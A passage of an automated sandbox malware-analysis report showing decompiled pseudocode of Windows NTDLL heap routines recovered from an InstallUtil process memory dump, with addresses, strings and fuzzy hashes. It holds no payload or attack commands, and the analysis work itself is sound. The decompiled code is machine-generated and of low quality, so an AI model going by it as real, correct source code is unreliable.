												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E0139E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E0139E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E012EFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E0139E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}

0x0139e833
0x0139e839
0x0139e83e
0x0139e841
0x0139e848
0x0139e84b
0x0139e851
0x0139e8b2
0x0139e8b2
0x0139e8b5
0x0139e90b
0x0139e911
0x0139e913
0x0139e913
0x0139e91a
0x0139e91d
0x0139e922
0x0139e924
0x0139e924
0x0139e924
0x0139e92f
0x0139e933
0x0139e935
0x0139e93a
0x0139e940
0x0139e948
0x0139e950
0x0139e955
0x00000000
0x00000000
0x0139e957
0x0139e95c
0x0139e9cb
0x0139e9d2
0x0139e9d4
0x0139e9f2
0x0139e9f6
0x0139ea10
0x0139ea18
0x0139ea1a
0x0139ea1f
0x0139ea2c
0x0139ea2d
0x0139ea2e
0x0139ea32
0x0139ea3d
0x0139ea42
0x0139ea45
0x0139ea51
0x0139ea60
0x0139ea65
0x0139ea68
0x0139ea6a
0x0139ea6a
0x0139ea6a
0x0139ea6f
0x0139ea76
0x0139ea7c
0x0139ea7e
0x0139ea81
0x0139ea85
0x0139ea88
0x0139ea8c
0x0139ea8f
0x0139ea93
0x0139ea98
0x00000000
0x00000000
0x0139ea9a
0x0139ea9d
0x0139eaa2
0x0139eb0e
0x0139eb15
0x0139eb17
0x0139eb33
0x0139eb36
0x0139eb39
0x0139eb3f
0x0139eb45
0x0139eb4a
0x0139eb52
0x0139ecb1
0x0139ecb9
0x0139ecbe
0x0139ecc3
0x0139ecc6
0x0139eceb
0x0139ecee
0x0139ecf9
0x0139ecfe
0x0139ed00
0x0139ed05
0x0139ed07
0x0139ed0a
0x0139ed0c
0x0139ed0e
0x0139ed12
0x0139ed19
0x0139ed1e
0x0139ed24
0x0139ed2a
0x0139ed2a
0x0139ed2c
0x0139ed3e
0x0139ed3e
0x0139eb5a
0x0139eb62
0x0139eb69
0x00000000
0x00000000
0x0139eb6f
0x0139eb75
0x0139eb79
0x0139eb79
0x0139eb88
0x0139eb8e
0x0139eb90
0x0139eb92
0x0139eb97
0x0139ed3f
0x0139ed45
0x00000000
0x00000000
0x0139ed4b
0x0139ed4e
0x00000000
0x0139eb9d
0x0139eb9d
0x0139eb9d
0x0139eba2
0x0139ebb5
0x0139ebbc
0x0139ebbe
0x0139ebbe
0x0139ebc3
0x0139ebc5
0x0139ebcb
0x0139ebd2
0x0139ebd5
0x0139ebdb
0x0139ebdf
0x0139ebe1
0x0139ebf0
0x0139ebf9
0x0139ec04
0x0139ec07
0x0139ec0a
0x0139ec82
0x0139ec85
0x0139ec8b
0x0139ec91
0x0139ec93
0x0139ec96
0x0139ec9b
0x0139eca6
0x0139ecac
0x0139ecae
0x0139ecae
0x00000000
0x00000000
0x00000000
0x00000000
0x0139ec0c
0x0139ec0c
0x0139ec0c
0x0139ec0f
0x0139ec12
0x0139ec15
0x0139ec15
0x0139ec18
0x0139ec1e
0x00000000
0x00000000
0x0139ec22
0x0139ec28
0x0139ec4b
0x0139ec5b
0x0139ec5d
0x0139ec63
0x0139ec65
0x0139ec68
0x0139ec6b
0x0139ec6b
0x0139ec70
0x0139ec71
0x0139ec74
0x0139ec7d
0x00000000
0x0139ebe3
0x0139ebe3
0x0139ebe6
0x0139ebe6
0x0139ebe7
0x0139ebe9
0x0139ebec
0x00000000
0x0139ebe6
0x0139ebe1
0x0139eba4
0x0139eba9
0x0139ebb0
0x0139ebb3
0x00000000
0x00000000
0x00000000
0x00000000
0x0139ebab
0x0139ebab
0x0139ebab
0x0139ebac
0x0139ebac
0x00000000
0x0139ebab
0x0139eb97
0x0139eb19
0x0139eb1c
0x0139eb21
0x0139eb26
0x0139eb2c
0x0139eb2c
0x00000000
0x0139eb26
0x0139ead6
0x0139ead9
0x0139eadc
0x0139eadc
0x0139eadc
0x0139eade
0x0139eae4
0x00000000
0x00000000
0x0139eaee
0x0139eaf7
0x0139eaf9
0x00000000
0x00000000
0x0139eb04
0x0139eb12
0x00000000
0x0139eb12
0x0139eb06
0x00000000
0x0139eb06
0x0139eaf0
0x0139eaf2
0x0139eaf4
0x00000000
0x0139eaf4
0x0139ea6a
0x0139ea21
0x00000000
0x0139ea21
0x0139e9d6
0x0139e9d6
0x0139e9e0
0x0139e9e2
0x0139e9e2
0x0139e9e8
0x00000000
0x0139e9e8
0x0139e987
0x0139e98f
0x0139e992
0x0139e995
0x0139e995
0x0139e998
0x0139e998
0x0139e99a
0x0139e9a0
0x00000000
0x00000000
0x0139e9a9
0x0139e9b2
0x0139e9b4
0x00000000
0x00000000
0x0139e9ba
0x0139e9c1
0x0139e9cf
0x00000000
0x0139e9cf
0x0139e9c3
0x00000000
0x0139e9c3
0x0139e9ab
0x0139e9ad
0x0139e9af
0x00000000
0x0139e9af
0x0139e924
0x0139e8b7
0x0139e8ba
0x0139e902
0x0139e908
0x0139e90a
0x00000000
0x0139e90a
0x0139e8bc
0x0139e8bf
0x0139e8f9
0x0139e8ff
0x0139e901
0x00000000
0x0139e901
0x0139e8c1
0x0139e8c4
0x0139e8f0
0x0139e8f6
0x0139e8f8
0x00000000
0x0139e8f8
0x0139e8c6
0x0139e8c9
0x0139e8e7
0x0139e8ed
0x0139e8ef
0x00000000
0x0139e8ef
0x0139e8cb
0x0139e8ce
0x0139e8de
0x0139e8e4
0x0139e8e6
0x00000000
0x0139e8e6
0x0139e8d3
0x00000000
0x0139e8d5
0x0139e8db
0x0139e8dd
0x00000000
0x0139e8dd
0x0139e853
0x0139e855
0x0139e85b
0x0139e85d
0x0139e897
0x0139e89c
0x0139e8a2
0x0139e8a6
0x0139e8ab
0x0139e8ad
0x0139e8ad
0x00000000
0x0139e85d

APIs

RtlDebugPrintTimes.NTDLL ref: 0139EA10
RtlDebugPrintTimes.NTDLL ref: 0139ED24

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: bd759135bb759c15f162cb397f4bdadb89bf9f9b6e82696ebfa53e0193f747a7
Instruction ID: 4a0fc2a6d2e6702aa0729e5e0130ab3e1974827f8cb79c6f27c62b748d80d2ed
Opcode Fuzzy Hash: bd759135bb759c15f162cb397f4bdadb89bf9f9b6e82696ebfa53e0193f747a7
Instruction Fuzzy Hash: 8802B072E0061A8FDF18CFADC89167EBBF6EB88204B59857DD456EB381D634E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012C40E1 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E012C40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E012CB150();
					} else {
						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012CB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E012CB150(", passed to %s", _t29);
					}
					_push("\n");
					E012CB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x13b6378 = 1;
						asm("int3");
						 *0x13b6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x012c40e6
0x012c40e8
0x012c40f1
0x0132042d
0x0132044c
0x01320451
0x0132042f
0x01320444
0x01320449
0x0132045d
0x01320466
0x0132046e
0x01320474
0x01320475
0x0132047a
0x0132048a
0x0132048c
0x01320493
0x01320494
0x01320494
0x00000000
0x0132049b
0x00000000

Strings

HEAP[%wZ]: , xrefs: 0132043F
HEAP: , xrefs: 0132044C
, passed to %s, xrefs: 01320469
Invalid heap signature for heap at %p, xrefs: 01320458
RtlAllocateHeap, xrefs: 01320468

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 14e4d653851720ef4d1d0432f7bd0d405d865ae53e4e9e1b6acd7787e89cc38c
Instruction ID: dd39ef3c9071fd5920b2dd33cd228f99522c52a990332c347b93e69af7854c99
Opcode Fuzzy Hash: 14e4d653851720ef4d1d0432f7bd0d405d865ae53e4e9e1b6acd7787e89cc38c
Instruction Fuzzy Hash: 200140321351519FD32D6769D45FF6277A8DB40F74F1C801DF10957641DBE45448C510

Uniqueness

Uniqueness Score: -1.00%

Function 012EA830 Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E012EA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x13b8748 - 1;
					if( *0x13b8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E012CB150();
									_t260 = _t257 + 4;
								} else {
									E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E012CB150();
								_t257 = _t260 + 4;
								__eflags =  *0x13b7bc8;
								if(__eflags == 0) {
									E01382073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0138A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0131D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E012EAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0138A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0138A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x13b8748 - 1;
					if( *0x13b8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E012CB150();
							} else {
								E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E012CB150();
							__eflags =  *0x13b7bc8;
							if(__eflags == 0) {
								_t131 = E01382073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x012ea83a
0x012ea83c
0x012ea83e
0x012ea841
0x012ea844
0x012ea84a
0x012eaa53
0x012eaa59
0x012eaa59
0x012ea858
0x012ea85e
0x012eaaf5
0x012eaafc
0x0133229e
0x013322a2
0x013322a8
0x013322b3
0x013322b5
0x013322bb
0x013322c1
0x013322c5
0x013322e6
0x013322eb
0x013322f0
0x013322c7
0x013322dc
0x013322e1
0x013322e1
0x013322f3
0x013322f8
0x013322fd
0x01332300
0x01332307
0x0133230e
0x0133230e
0x01332313
0x01332313
0x013322b5
0x013322a2
0x012eaafc
0x012ea864
0x012ea869
0x012eaa5c
0x012eaa5e
0x012ea86f
0x012ea87f
0x012ea885
0x012ea885
0x012ea88b
0x012ea890
0x012ea896
0x012eab0c
0x012eab0f
0x012eab15
0x01332320
0x01332320
0x012eab1b
0x012ea89c
0x012ea89f
0x012ea8a2
0x012ea8a2
0x012ea8a5
0x012ea8af
0x012ea8b3
0x012ea8b8
0x012eaa66
0x012ea8be
0x012ea8c5
0x012ea8c6
0x012ea8ce
0x01332328
0x01332332
0x01332337
0x01332337
0x012ea8ce
0x012ea8d4
0x012ea8d8
0x012ea8db
0x012ea8de
0x012ea8e1
0x012ea8e5
0x012ea8e8
0x012ea8f0
0x012ea8f3
0x0133234c
0x01332350
0x01332355
0x01332359
0x01332359
0x012ea8f9
0x012ea901
0x012eaae4
0x012eaae4
0x012eaaea
0x00000000
0x012ea907
0x012ea90a
0x012ea91d
0x012ea91d
0x00000000
0x012ea910
0x012ea910
0x012ea910
0x012ea914
0x012ea924
0x012ea924
0x012ea924
0x012ea924
0x012ea916
0x012ea91b
0x00000000
0x00000000
0x00000000
0x012ea91b
0x012ea925
0x012ea925
0x012ea932
0x012ea936
0x012ea93c
0x012ea93c
0x012ea93c
0x012eab22
0x012eab24
0x012eab27
0x012eab27
0x012ea942
0x012ea944
0x012eaaba
0x012eaabd
0x012eaac0
0x012eaac0
0x012eaac2
0x012eab2f
0x012eaac4
0x012eaac4
0x012eaac7
0x012eaaca
0x012eaacc
0x012eaace
0x012eaace
0x012eaace
0x012eaad1
0x012eaad1
0x012eaad7
0x012eaad9
0x00000000
0x00000000
0x01332361
0x01332369
0x0133236b
0x00000000
0x01332371
0x00000000
0x01332371
0x00000000
0x0133236b
0x012eaac0
0x012ea94a
0x012ea94a
0x012ea94d
0x012ea94d
0x012ea950
0x012ea954
0x01332376
0x01332380
0x012ea95a
0x012ea95a
0x012ea95c
0x012ea95f
0x012ea961
0x012ea961
0x012ea967
0x012ea96a
0x012ea972
0x012eaa02
0x012eaa06
0x012eaa10
0x012eaa16
0x012eaa16
0x012eaa1b
0x012eaa21
0x012eaa24
0x012eaa27
0x012eaa29
0x012eaa2c
0x012eaa32
0x00000000
0x00000000
0x00000000
0x00000000
0x012ea978
0x012ea978
0x012ea97b
0x012ea981
0x012ea996
0x012ea998
0x012ea99f
0x012ea9a2
0x0133238a
0x012ea9a8
0x012ea9a8
0x012ea9a8
0x012ea9aa
0x012ea9ad
0x012ea9b0
0x012ea9bb
0x012ea9be
0x012ea9c7
0x012ea9c9
0x012ea9c9
0x012ea9cc
0x012ea9d1
0x012eaa6d
0x012eaa70
0x012eaa73
0x012eaa75
0x012eaa79
0x012eaa7e
0x012eaa82
0x012eaa8f
0x012eaa94
0x012eaa96
0x01332392
0x013323a1
0x013323a1
0x012eaa9c
0x012eaa9f
0x012eaaa2
0x012eaaa2
0x012eaaa8
0x012eaaab
0x012eaaaf
0x00000000
0x012eaab5
0x00000000
0x012eaab5
0x012ea9d7
0x012ea9d7
0x012ea9da
0x012ea9e0
0x012ea9e3
0x012ea9e6
0x012ea9e9
0x012ea9eb
0x012ea9fd
0x012ea9fd
0x00000000
0x012ea9eb
0x00000000
0x00000000
0x00000000
0x012ea983
0x012ea983
0x012ea983
0x012ea987
0x012ea995
0x012ea995
0x012ea995
0x012ea995
0x012ea989
0x012ea98e
0x00000000
0x012ea990
0x00000000
0x012ea990
0x012ea98e
0x00000000
0x012ea983
0x012ea972
0x012ea90a
0x012eaa34
0x012eaa34
0x012eaa40
0x012eaa43
0x012eaa46
0x012eaa4d
0x013323ab
0x013323b2
0x013323b8
0x013323be
0x013323c3
0x013323c5
0x013323cb
0x013323d1
0x013323d5
0x013323f6
0x013323fb
0x013323d7
0x013323ec
0x013323f1
0x01332403
0x01332408
0x01332410
0x01332417
0x01332422
0x01332422
0x01332417
0x013323c5
0x013323b2
0x00000000

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01332403
HEAP[%wZ]: , xrefs: 013322D7, 013323E7
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 013322F3
HEAP: , xrefs: 013322E6, 013323F6

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: bb3f082c77c36a4a92622073ab2342cc8d657ec16eeef5a026dd8816b1b8911c
Instruction ID: b30daabd23016b28e6840ea6002319afab76958199dc64e3c78a2a8b8b223e4c
Opcode Fuzzy Hash: bb3f082c77c36a4a92622073ab2342cc8d657ec16eeef5a026dd8816b1b8911c
Instruction Fuzzy Hash: 27D1E134A202068FDB19CF6CC495BBABBF1FF98304F55856DDA5A9B342E370A845CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012EA229 Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E012EA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
